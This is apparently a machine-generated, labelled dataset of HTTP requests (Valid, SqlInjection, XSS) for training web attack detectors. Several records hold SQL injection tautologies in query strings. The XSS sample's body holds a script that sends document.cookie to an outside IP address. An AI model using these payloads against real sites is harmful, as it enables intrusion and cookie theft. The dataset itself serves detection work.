UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7095x5636
Via: 4.7 0.69.197.174, 6.1 www.nmnt.jpeg
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41806
Start - Id: 21591
class: Valid
GET /YQ7caccess_logjhavingO5EHLEZ/T9akrMPbfqw2/gj9WN2DRzXnU-bjwS/sLcuTHPsOK/ge8iHw.css?yhpaadbephE6oid=59renposition%3A%28%3Eeopt%27%40Jc+&JddSDecuVt=a%260l%7Cbgsoundh+xery%3C%5D&s5iLM=cooebhrgisi&bsrush6naFmwr=a0alecooihwSd&ecetettbtink3=4 HTTP/1.0
Host: 147.98.241.110
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.5, euc-cn;q=0.1, koi8;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 152.191.209.222
Cookie: ojnte3smhoisa=hAp56mrTet9cytmiHl;mre=gatpsi
Cookie2: $Version="719"
Date: Mon, 13 Dec 04 16:52:43 GMT
ETag: "HbDOE4mELUlA4X1_S"
Expect: EfeOt
From: octEhy@eenoS.org
If-Modified-Since: Wed, 14 Nov 07 06:44:01 CET
If-Unmodified-Since: Tue, 03 Feb 04 07:13:58 CET
If-Match: *
If-None-Match: *
If-Range: "LTO6i8y7P89WU.AKjQ"
Max-Forwards: 33
MIME-Version: 2.8
Pragma: ae='deriaY'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: ykiee rotu=n2onenx
Range: 2-,639-89,039-12407
Referer: /6cedhxk/doisn/bNeh/pud9idoo/iws2hdt.jsp
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: oepstnaie8 (dAYZp3B)
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1645x752
Via: htnho/9.2 www.9eys.tiff:4, HTTP/3.7 100.23.86.16:98479
Transfer-Encoding: deflate
Upgrade: blnen/8.7
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 99.21.116.3
X-Serial-Number: 0418048557333038
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21591
Start - Id: 31597
class: Valid
GET /amhnhe/2GX/hsbV.uiZ5pcCABI5g/p2sgoN2qdivTMSP@/negoabt6y5rbaawgsy/1tWFYOZIw/oseabcwanc6rsr9oh4r/mE97WKvonHXPIernp1s/heena/edbnc_QjMb9sJj5l-/f_FqF.jpg?unionKMHpmeta6StU=359431&nf0dryhiRn=pnnosriTte&nlihTpfEn=48807578&bachc5ptrstm=hsh&nooEetnr3r=088563306&twn=i%24to&hrebgll3ro=EDdnw HTTP/1.0
Host: www.ethiesol5u.de
Connection: keep-alive
Accept: audio/*
Accept-Charset: macintosh, iso-8859-8-i;q=0.3, iso-8859-2, utf-7;q=0.3, euc-tw
Accept-Encoding: *
Accept-Language: otescz-rrd7pe, 4uOe-6ereiea, e-onrioa
Cache-Control: ie=sesf
Client-ip: 224.236.44.193
Cookie: gietThhOtsatta=24;noTiALraGiunr=lxvacsirwegnId
Cookie2: $Version="533"
Date: Mon, 24 Jul 06 01:14:38 CET
ETag: "yVNzbJcnpSbQm-OQ"
Expect: 100-continue
From: Seenwnj@easRlfj.biz
If-Modified-Since: Wed, 15 Oct 08 21:53:20 GMT
If-Unmodified-Since: Tue, 11 Aug 09 07:53:19 CET
If-Match: *
If-None-Match: "vCEaLDluCVcdtSWwh0E"
If-Range: "Heox8s9sVyHUmejy"
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest response="FD8ADbEE2Add907cB1Da0CFF05F24cbe"
Authorization: sNjic deeIae=enbrepsp
Range: -96734,-3593,7159-
Referer: http://www.kmwrc.com/1srrGo/rw1tu/bdridH/nma7a/eexwstp.aspx
TE: trailers,chunked;q=0.8,trailers
Trailer: Transfer-Encoding
User-Agent: gcBnA8s1
UA-CPU: PowerPC
UA-Disp: 165,316,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3066x402
Via: HTTP/7.1 www.ism1.gif:2, 8.4 www.eobatt.html:4, HTTP/6.5 www.nuhc2a.html
Transfer-Encoding: identity
Upgrade: 13nw/2.3, boittr/0.2, wehuPi/3.1, zbnegf/5.6
Warning: 067 www.best.shtml:07 "d0hsk" "Fri, 17 Nov 06 15:02:05 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 326800001017
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31597
Start - Id: 12671
class: Valid
GET /yjdevw/Wtttxmomeio9eht5l/ie/rl/aKxrXca-ZEzc_azaWUf/zvy/rPJSJ22Shhsa6.msf?gtgpr=1EyW&eajp0e=ssbnrnirece4dsr&nleod8cpalueuta=%40varlsM&ay=c-6azHcg&sfgveici=1719192418&sqe9oorsuhe=odeiyqgusreb%3Ffnyy1&tt=0 HTTP/1.0
Host: 212.179.5.49
Connection: moNCa40
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: ceEt-n;q=0.1, e7aNirOn-etadtn;q=0.3, napinmi-asgopt8t;q=0.1
Cache-Control: only-if-cached
Client-ip: 106.196.115.151
Cookie: olff=WnAitdntidid;ny0traA=mcdnmi4Oew;ovty6aNp=4983772154;oe=17
Cookie2: $Version="6"
Date: Sun, 21 May 06 01:43:50 CET
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: 100-continue
From: Wno4tsep@oNhaeon.biz
If-Modified-Since: Wed, 08 Jul 09 09:19:40 CET
If-Unmodified-Since: Thu, 23 Feb 06 10:48:02 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 275
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM dDZocGFoY2FlbXZsN3JzZVN0R25OMXJyZXRvZnRlT2U=
Authorization: sd1kn momio=sfoet
Range: 123920-
Referer: /Fmbrs.htm
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 0.3; j6-nE; rv:7.2.9) Gecko/13490777
UA-CPU: PowerPC
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 118x1271
Via: hbh/8.8 234.34.178.243, HTTP/7.7 247.9.179.38
Transfer-Encoding: gzip
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 604 0.169.62.121 "ntoiigc3nubtmi3tnc" 
X-Forwarded-For: 158.192.234.112
X-Serial-Number: 5004976
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12671
Start - Id: 10624
class: Valid
GET /JT0Q@Wt0wgetqs/@OlexecM8wp-RY40/1xM8heoavuenre.jpg?nulfost8asendr=8t%5Co&amtsfEqbuiet=714418&Lncqyu=o7s&sbkDu=elMefaccept%25&c-QFOs=eZSo HTTP/1.1
Host: www.tineguie.biz
Connection: close
Accept: text/*;q=0.3, video/*;q=0.3, audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, gzip;q=0.1, gzip;q=0.1, identity, identity;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 38.171.40.252
Cookie: Soin=idahitworadnselpby;tle2iei=otc(buylvbscripta zre8AHuX;ta=<;ianUt=t;dto;b1YivE6=804950;tr3oflon0=dpsk
Cookie2: $Version="1"
Date: Thu, 08 May 08 10:02:47 UTC
ETag: "NN_8Kks2XszEAFbz9PAi"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Wed, 20 Jul 05 20:50:12 GMT
If-Unmodified-Since: Mon, 15 Jan 07 09:20:41 CET
If-Match: *
If-None-Match: *
If-Range: "U_ERmxmCGtNCnm1Fn"
Max-Forwards: 455
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest nc=1acDDb34
Authorization: Basic YTVoU3Q6bnhjUw==
Range: 6-0447,7686-38299,7705-
Referer: http://SpCm.de/Nnbn7e/raxrjI/vhsdehse/8rtieC.rar
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.0 (compatible; rhwoasuct; Solaris; ny9eT)
UA-CPU: 68000
UA-Disp: 9474,018,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7494x790
Via: FTP/0.9 www.mosrnt.jpeg
Transfer-Encoding: identity
Upgrade: telnx/9.9, iusnr/3.5
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10624
Start - Id: 42473
class: SqlInjection
GET /ai3sqaeETbc/t5rMzLbTmbEMAiR9h8nG/Rk2xbodyoqhtacces7aT/aK3Ip1t5N_-u/CALdW8F/kMLDdHT0tTRSoqelJ/55/dkiehaa4eutunsart3/a4@1do5NGM9184zxrp/8l.Hhzqj8S8-/e3iaaa/ym.jsp?antetwnnaa=%27+OR+++++%27dtA9%27+++++%3D++++N%27++++&JMan=vtynalikes%2BwhereiSEpvek&Shaving4z=ut&ltt=oeehYndehauetY5c&aw0Tokt8wOIriyi=sii%3Fn&W_bI=02937626&cnl=evalOo%27admindsock_streamC&s9=iD1hQ&it9vp=jeorpwehc%2BSsa HTTP/1.0
Host: www.hTld.biz
Connection: esfr
Accept: */*;q=0.0
Accept-Charset: isiri-3342;q=0.9, iso-10646-ucs-2;q=0.2, x-mac-turkish
Accept-Encoding: deflate;q=0.9, compress;q=0.4, deflate, identity
Accept-Language: p-caf;q=0.2, qdtaaa-et;q=0.1, ggi5m-dfra;q=0.6
Cache-Control: max-age=561
Client-ip: 215.204.118.143
Cookie: ehcfue=csrn
Cookie2: $Version="582"
Date: Sat, 23 Dec 06 23:44:37 CET
ETag: W/"O31nD@J3Iu0A1HEKQNyE"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Wed, 17 Oct 07 04:41:04 GMT
If-Unmodified-Since: Thu, 25 Feb 10 21:49:27 UTC
If-Match: "3jZ1Ow8wUTNQRCQS2l2"
If-None-Match: *
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 88
MIME-Version: 4.3
Pragma: Df='n2'
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 909400-,77915-,-01017
Referer: /x55llsac/1txdhae/nnedwamh/s02a8sr/che69e.pdf
TE: gzip,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: hhannkd/6.0.1.4.7
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/1.2 64.160.114.64, 4.9 www.bzwpSBd.jpg, 3.2 www.zSsrwCp.htm
Transfer-Encoding: gzip
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42473
Start - Id: 7175
class: Valid
PUT /poiwtcsShaao2eeoae/ePrABs.tiff? HTTP/1.0
Content-Length: 86
Content-Language: 0h,de,gi
Content-Encoding: deflate
Content-Location: http://www.lretgin.uk/t7AcRxa/i2aro/E1kehpae/Tgmqosne.sh
Content-MD5: YWM5QWFzZjZoZnI2b2p1NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Aug 09 17:44:41 CET
Last-Modified: Mon, 25 May 09 16:50:25 GMT
Host: 98.38.8.232
Connection: keep-alive
Accept: audio/x-wav, text/*;q=0.8
Accept-Charset: windows-1253;q=0.9, iso-8859-6;q=0.3, koi8, euc-cn;q=0.8
Accept-Encoding: *
Accept-Language: 3aeda-ue;q=0.0, s-see, RtC-isnigE7, gu1mbz51-1By
Cache-Control: no-cache
Client-ip: 143.244.115.21
Cookie: Apldnhee=oogfo0dfihr6 a no;mc82wtte=oarn;OdhmTrss=ac5;igtsesxhw=ZmttpoxbEn
Cookie2: $Version="19"
Date: Fri, 24 Jun 05 09:12:06 CET
ETag: "DCQXzbIa3QQxm.F7R5M"
Expect: HdnoTor
From: a0Qar@yilcQa.net
If-Modified-Since: Mon, 10 Jul 06 23:58:04 UTC
If-Unmodified-Since: Thu, 19 Jul 07 21:10:37 GMT
If-Match: "aiCcdabKqB0QDsoKjkA"
If-None-Match: "2BrKhw7N9WEkf2A3xW5"
If-Range: Thu, 29 May 08 07:43:51 UTC
Max-Forwards: 335
MIME-Version: 8.4
Pragma: fuahH=nbrhr
Proxy-Authorization: Basic YWhsbzpudGRlZQ==
Authorization: NTLM NFBsdGVJdml5ZXlvZW51cjd0ZmxpdGVheWtzNHJlaXNpZGFobW9LbkRtdDNlbQ==
Range: 975551-,9376-71358
Referer: /ttre8h6/ap6fa9/CORntlz/4brc/3tZM1.php4
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 4.6; de-8c; rv:1.5.9) Gecko/71545608
UA-CPU: MIPS
UA-Disp: 337,1594,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7035x878
Via: 7.5 245.13.187.254
Transfer-Encoding: compress
Upgrade: ootqah/6.7, il5/2.2, feDseo/1.9, sce/8.2, s2ch/9.0
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 113.209.161.140
X-Serial-Number: 94479468040904290
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tte67he5=neuh&KjAO=2&sJ1w=qQUy3&ts7jS49swleemsy=ohome&I7-inputgxfeS=a8rgtfochln&se=sko

End - Id: 7175
Start - Id: 25737
class: Valid
GET /x5rpaonhUu6O/d_8/juitohoXP/dWRTGbDX3l/mKv25jO9H@rOiILasW5/eqIdGXbHGFV5st/eeutgan8afwalkibiM/cJWhCF0YtJ/ar8J@Is54ZEd_-q-uku/ihiEepwp/vM2kcf6fIE9GyvAJ_DX/8kxQRRj_o5nlYL7gYNQY.tiff?k0logqcMdbhhttpY=ac3m_Git3PTO&PZ%uG3R7ZBWDH=lAs4yricasnbetween%7Cb&ntto5iAui1Abr=a%246H+xht&a1=4964&cxsNaeae=20423504&YeieEoyhekrons=dmrhvotcoperua&UdBKX6HvixmlZk=s+nm%3A&ts0henohiqtu=txdZ0Adfeb HTTP/1.0
Host: www.4eap5.de
Connection: ldnonA
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 201.188.83.227
Cookie: oeisEhnbgnmpo=asuea
Cookie2: $Version="25"
Date: Tue, 21 Jul 09 05:24:31 CET
ETag: W/"Hd49XJxD5aG5izO-T"
Expect: mfpntsav
From: nisoe@sgkdtlfs6d.uk
If-Modified-Since: Mon, 02 Aug 04 20:22:50 UTC
If-Unmodified-Since: Sat, 25 Feb 06 14:01:15 GMT
If-Match: "jJFIsq6nyU0BzBB"
If-None-Match: *
If-Range: Mon, 16 Jun 08 14:49:01 GMT
Max-Forwards: 67
MIME-Version: 9.2
Pragma: wcsnEnjx=r98wde2A
Proxy-Authorization: Digest qop=eedi
Authorization: NTLM aGljc2xldDNueXNjd3ZlMjFlYW1yNWVuaGFuZUNhYWVFb3lzaG9Zck9yNm1lbA==
Range: 5-5065,03839-,886020-
Referer: http://www.nhuanhb.ch/memuxtM/mntce/oanAmn.mdb
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 8.5; bn-9r; rv:9.6.1) Gecko/37205016
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7472x595
Via: 7.6 89.76.223.189, 4.6 www.zeteO.jpeg, HTTP/9.2 105.239.238.101
Transfer-Encoding: identity
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 612 www.1jatrt.shtml "npmzRiead4" 
X-Forwarded-For: 1.21.31.218
X-Serial-Number: 64360194
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25737
Start - Id: 10583
class: Valid
GET /Ein9EB_/rdw/mvutm7tnjhlml/zh/tah/kHBqqnRu-ydg/llC5UiswNykhlj6ts/35Otv7_nC@e9OQWCSNl/t5Nt539@WCR/e0m6cxiE/Rrv6tetmcEtui.pl?SmsMzee=%25ure3dalwp-2&hg1leiseodgoocn=lOWg9N35aU%40z&eDxdahstm=18765500&eighrgd=wQ8dbNW-K&2z4RwO8uselect5sxp_=r6oese&dbg7ym=to&sats4tmtcc=aMSrE156%40Z&lelne4aomnAkaal=3053197949&ysfpri=%5Cimgre-a%5Dnct&eThInNt1a=824&ta=oo92+&ovHtfgat=aen4zs HTTP/1.0
Host: 183.120.8.52
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 199.95.124.13
Cookie: sisvi9Uape5=rZX-dmnOV9;9cyae=oXwdmseitahosclZy;I6flike=ibAlnm4rLS;ga=i@etsock_stream
Cookie2: $Version="94"
Date: Tue, 23 Jun 09 14:57:13 CET
ETag: W/"lOOiGyG8HGcYRzud"
Expect: raar
From: mohdrcal@8y7xh.de
If-Modified-Since: Sat, 27 Nov 04 10:41:51 UTC
If-Unmodified-Since: Sat, 20 Dec 08 15:05:15 CET
If-Match: "0cTIu_SDO4XOANDEr"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.8
Pragma: b=s
Proxy-Authorization: Basic dU9vZGF4bGg6ZE9nc3I=
Authorization: syes otesaxn=siewcre
Range: 13113-277,3-670,8449-3
Referer: http://P4iaddb.ch/dtOzs/lqhs/gaodce.shtml
TE: trailers
Trailer: Authorization
User-Agent: 6sioob (tnH4FSaf; sM2i.X)
UA-CPU: x86
UA-Disp: 4066,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 170x2008
Via: 05evE/5.8 190.179.167.48
Transfer-Encoding: deflate
Upgrade: Een/6.5, oelp/1.9, pepbl/8.4, hcTat/2.7, Uihj/0.1
Warning: 101 www.lSyoa.html "se09rYrre6" 
X-Forwarded-For: 109.176.189.188
X-Serial-Number: 340706
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10583
Start - Id: 24183
class: Valid
GET /iVxoN2Jq_-bz/K48dVWsCboot.iniDall/nngN6H..html?aD8q=dc9eedoS&unobll=tswyk&blobE=145 HTTP/1.1
Host: www.tavli.uk
Connection: oSteoe
Accept: image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: tenind23=ihcwwl
Client-ip: 218.99.99.50
Cookie: an0Sa6=kM5;rlxoioau=837873330
Cookie2: $Version="26"
Date: Thu, 07 May 09 18:22:36 CET
ETag: W/"Im8RvswVer9nk7sM"
Expect: syl4eApn
From: ayael@sasgerntqn.it
If-Modified-Since: Wed, 28 Sep 05 06:46:55 CET
If-Unmodified-Since: Sat, 25 Apr 09 02:09:05 UTC
If-Match: *
If-None-Match: "Pgb9RFhrSTADgXsatz"
If-Range: Sun, 23 Aug 09 16:52:37 GMT
Max-Forwards: 31
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: tiea eyfn=erdlElt
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: http://www.7Hph4.com/uryn6.tiff
TE: deflate;q=0.9,trailers
Trailer: Upgrade
User-Agent: HihiDquo1e (z@H64lGE; eD6PVHK)
UA-CPU: PowerPC
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x070
Via: 8.7 www.Oatunu.tiff
Transfer-Encoding: gzip
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 172.198.248.143
X-Serial-Number: 742584885345002527
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24183
Start - Id: 42452
class: SqlInjection
GET /ai1yrfle/kWuTlk/mCpdrp_d0IKn@5A7C/nnNtolsibZ/kivsginotfoSegmtGtoi/kkkG-Po.exe?siis=cpLpa0irdtiak&Ree=%3Atdt&ta9eSexdyas=095136838&2th3mi4n=%27+OR++++%27le%27++++%3E++%27S&beailAA3anmiaa=janzteal&oy5emieeUheaS=Cmimglryzoopt2no&N5rnconl=e8aFi8statee&9vuHsrrtb7yqo=6483&sh2oFp1om6nooYy=64&mchildBcopysamS2CyY=otA&t8nfeeam=eA.2EZKn_koy&teecTde1nhxew=5&cOjsliTin5fgo=lib2&f7i1re=u HTTP/1.1
Host: 58.231.210.111
Connection: close
Accept: video/*, application/*;q=0.5
Accept-Charset: cp-932;q=0.6, x-mac-japanese;q=0.5, euc-jp, iso-8859-8-i;q=0.6, cp-950
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 220.25.102.83
Cookie: cnitateaHfn=iatsdxkn;boxOwcpTa8c38=xizd;IYTsamA5M4httpGI=)whereTlr;o6taaau=2827480716
Cookie2: $Version="574"
Date: Sat, 03 Mar 07 07:07:07 UTC
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 100-continue
From: Oselc@mtgpaa.net
If-Modified-Since: Thu, 21 Aug 08 14:28:31 GMT
If-Unmodified-Since: Mon, 21 Sep 09 18:58:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 289
MIME-Version: 0.7
Pragma: ebeE=lb9hcCeo
Proxy-Authorization: Digest realm
Authorization: sslt Eskt=oit2itS
Range: 6369-,501-7998
Referer: /hofinse/sy4tm/uo9e/mnE6ts.doc
TE: trailers,chunked,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: ikpGRE http://www.htcayn.uk
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0316x1204
Via: TrY/3.8 www.iewg.htm, 8.2 176.25.165.134, 5.4 138.92.73.17
Transfer-Encoding: gzip
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 631261097
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42452
Start - Id: 46959
class: XSS
POST /3.mMS.SX.sh? HTTP/1.1
Content-Length: 449
Content-Language: e
Content-Encoding: deflate
Content-Location: http://CpfEj.net/h7qul/eiAbeia.exe
Content-MD5: eHJldGFoaGFyYWVhM3VpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Apr 05 08:29:42 GMT
Last-Modified: Sat, 09 May 09 01:41:35 UTC
Host: www.2ccjy2oo.it
Connection: hdrhtyEt
Accept: */*;q=0.7
Accept-Charset: windows-1258
Accept-Encoding: *;q=0.2
Accept-Language: ilm6-tiw;q=0.3, rwnsbl-EnpeflE;q=0.6, Twmt-yaThh, 0-rnaIbaid;q=0.6, rtT7dr-h;q=0.0
Cache-Control: max-age=779
Client-ip: 248.152.241.195
Cookie: 4ze=1;tnt2a=include=e;shfEde=t@GR;CMXx=2kbaegesi;haeLkncdo9=e1givdAa.3u
Cookie2: $Version="609"
Date: Tue, 31 Oct 06 07:08:33 GMT
ETag: "NViduy7oqvlSc-i"
Expect: 100-continue
From: trhir@9toer.gov
If-Modified-Since: Mon, 05 Jul 04 14:41:47 CET
If-Unmodified-Since: Tue, 05 Feb 08 20:46:30 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Mar 10 13:20:16 UTC
Max-Forwards: 1
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: echMmd VljPnr=nbrGo
Range: 7-,-974,384-64
Referer: http://www.mrjmhI.biz/nNBl/lisee/ni1pOers/Annl.htm
TE: trailers
User-Agent: lpeds (su8wscKYL; aTYcW-e3; nwT_psp@1Q; ww-9NxBY; el6JOF)
UA-CPU: x86
UA-Disp: 698,9133,32
UA-OS: FreeBSD
UA-Color: color16
Via: 8.2 www.RUnn8ob.html, 6.4 65.123.252.221
Transfer-Encoding: gzip
Upgrade: aef/2.4, poaoke/2.0, 3hsnf/0.2
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ij=(a o&od=1760971&df=wa6o s>1\u$yand&b8ooweacam=oraqoaAh%u&seeuh92tSEii=0s&aAcrdaui=<![CDATA[<!--]]><script>[window.open('http://99.216.36.187/st.cgi'+document.cookie);]//--></script    >&eal=cigabeuAincludea&passwdWwindow.openN0_0=execslnsoAlstdin&ioadrWvU=4&eDi3=odeaGJ&cmmhI1ie=\gtEu&vInjsraesod=;sttheen&eIkn3ygpzw2hrn=wmtnnsi0rur&omxs=3800093983&emh7ciarWf=he8See&Sceid

End - Id: 46959
Start - Id: 16365
class: Valid
GET /3Z.tiff?lotw=ggIh%26&eocnto7s3x9o=ltce HTTP/1.1
Host: www.evlomelAjn.be
Connection: 7ptv8t
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 54.228.251.223
Cookie: 7orheuhne0f=51808007;Jnprocessing-instructiondjJJprocessing-instructionIuftpm=o;l75g4leounsaa=eei@@txo;lShk849eEhh0ez5=wen ;itwa3lsnebls6=bljrn
Cookie2: $Version="4"
Date: Fri, 22 Dec 06 16:36:57 GMT
ETag: "onlsszDc9zK05KmB"
Expect: 100-continue
From: sywanaut@mnclxCmii.st
If-Modified-Since: Sat, 21 May 05 11:55:21 UTC
If-Unmodified-Since: Sat, 26 Aug 06 04:09:45 CET
If-Match: "Zh_U1CQc523.5FoD"
If-None-Match: "XSFmeOduK1wp9A1JQ"
If-Range: Sun, 27 Nov 05 24:42:13 GMT
Max-Forwards: 8100
MIME-Version: 3.9
Pragma: a='zo7pso'
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: hhmait r6stoO=hMott
Range: -652120,9-,091-
Referer: /aLadsctb.mdb
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: edmesij/3.9
UA-CPU: MIPS
UA-Disp: 528,336,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 942x4490
Via: FTP/6.4 www.tetiioo.htm, 8.0 www.aeOrrbra.css
Transfer-Encoding: tawpt; EfzR2nk=lxssc
Upgrade: oE3e1/2.9, FMnex/9.0, o72ibo/5.9, dtimd/8.4
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16365
Start - Id: 14627
class: Valid
GET /kF2J9AaPWFmlUZ/ihtjweaATsxaanvhlha/LLkAi8oiscriptcat/gukjNsock_streamCVh/ttgtd5hhgdjs/cJlNSFcyC39ilDPox/-tmpT/PhoptXv/sXbhtpasseSetchNUwGzl/jmuln7bannnnreraXoyo.shtml? HTTP/1.1
Host: www.admr.cz:80
Connection: keep-alive
Accept: text/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: o6d1i-entt, t4im-peinpdu;q=0.1, 6dv-AUqe
Cache-Control: only-if-cached
Client-ip: 3.97.160.94
Cookie: dLatni0itdi=2eGEtj7nieQA;2ugesElbs7nwsbm=Se5hb;.URkbMQ3lBnaccept=e4uuI1aVjOT;snatewt=09
Cookie2: $Version="53"
Date: Fri, 30 Nov 07 21:02:45 GMT
ETag: "x6eT1qHW17aeJ4b"
Expect: tucnnil5
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Fri, 17 Jun 05 05:00:44 UTC
If-Unmodified-Since: Fri, 22 Jul 05 15:45:15 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Dec 08 05:04:29 CET
Max-Forwards: 6
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM dDNuMHR1dGNnaHNsaHR1bmhtbm5vYWVlb2htcnRwdG51ZXllZXBkYXNvNHRvcg==
Authorization: Digest response="F0dDECF2C5cd78b6a5385FBc9fcE54aF"
Range: 014236-,328751-67,-519123
Referer: http://eetuvi.de/igWVld/bwb9i/yEiht/tz9nd.dll
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/2.8 (compatible; MSIE 4.1; WinNT; e0loseY; z7ete)
